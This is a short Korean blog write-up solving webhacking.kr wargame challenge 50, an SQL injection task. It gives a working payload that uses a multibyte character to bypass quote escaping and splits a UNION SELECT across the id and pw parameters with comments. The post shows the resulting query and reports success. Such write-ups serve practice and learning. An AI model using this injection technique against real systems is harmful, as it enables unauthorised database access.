webhacking.kr 50번

Wargame/webhacking.kr 2018. 1. 17. 15:22

webhacking.kr 50번 문제다.

점수는 450 point.

sql injection문제다. 

소스 있길래 확인해 봤다.

45번에서 봤던 mb_convert_encoding 함수가 보인다. '쿼터 우회해서 3값만 나오게하면 간단할 것 같다. 근데 union이 id에서 필터를 당한다. 그러면 union을 pw쪽에서 주면 될 것 같다.
id=%aa'/*&pw=*/union%09select%093# 이런식으로 주면

select lv from members where id='%aa'/*' and pw=md5('*/union select 3#')

/**/주석처리로 인해 빨간 부분들이 날라간다.

이제 위에 특수기호만 url인코딩해서 넘겨줘봤다.

성공!


'Wargame > webhacking.kr' 카테고리의 다른 글

webhacking.kr 52번  (0) 2018.01.18
webhacking.kr 51번  (0) 2018.01.17
webhacking.kr 49번  (0) 2018.01.17
webhacking.kr 48번  (0) 2018.01.17
webhacking.kr 47번  (0) 2018.01.17
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

공지사항

글 보관함

달력

«   2025/01   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

티스토리툴바